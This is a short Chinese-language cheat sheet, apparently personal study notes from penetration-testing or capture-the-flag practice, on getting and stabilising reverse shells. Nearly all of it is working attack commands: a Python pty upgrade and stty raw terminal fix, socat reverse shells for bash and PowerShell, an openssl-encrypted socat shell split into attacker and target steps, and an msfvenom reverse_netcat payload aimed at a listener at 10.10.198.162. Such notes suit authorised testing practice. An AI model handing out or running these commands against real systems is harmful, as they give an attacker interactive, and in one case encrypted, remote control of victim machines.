what the shell

反弹shell拿到后怎么稳固呢

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

ctrl + z回到本地
执行stty raw -echo; fg

socat 反弹shell

socat TCP:127.0.0.1:9999 EXEC:"bash -li"

Windows上
socat TCP:127.0.0.1:9999 EXEC:powershell.exe,pipes

socat TCP:127.0.0.1:9999 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

加密shell

攻击机
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

cat shell.key shell.crt > shell.pem

socat OPENSSL-LISTEN:9999,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0



目标机
socat OPENSSL:127.0.0.1:9999,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

msf
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.198.162 lport=8888 R